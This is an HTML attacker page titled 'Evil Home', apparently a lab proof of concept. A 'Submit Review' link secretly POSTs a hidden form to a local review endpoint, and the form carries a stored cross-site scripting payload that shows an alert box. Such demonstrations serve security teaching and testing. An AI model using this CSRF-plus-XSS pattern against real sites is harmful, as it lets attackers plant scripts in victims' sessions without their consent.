<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Evil Home</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
        }
        .container {
            text-align: center;
            margin-top: 50px;
        }
        h1 {
            color: #333;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Evil Home</h1>
    </div>
<form id="reviewForm" action="http://localhost:8080/review" method="POST">
    <input type="hidden" name="review" value="<script>alert('ciao');</script>">
</form>

<a id="submitReviewLink" href="#">Submit Review</a>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        document.getElementById("submitReviewLink").addEventListener("click", function(event) {
            event.preventDefault();
            document.getElementById("reviewForm").submit();
        });
    });
</script>

</body>
</html>
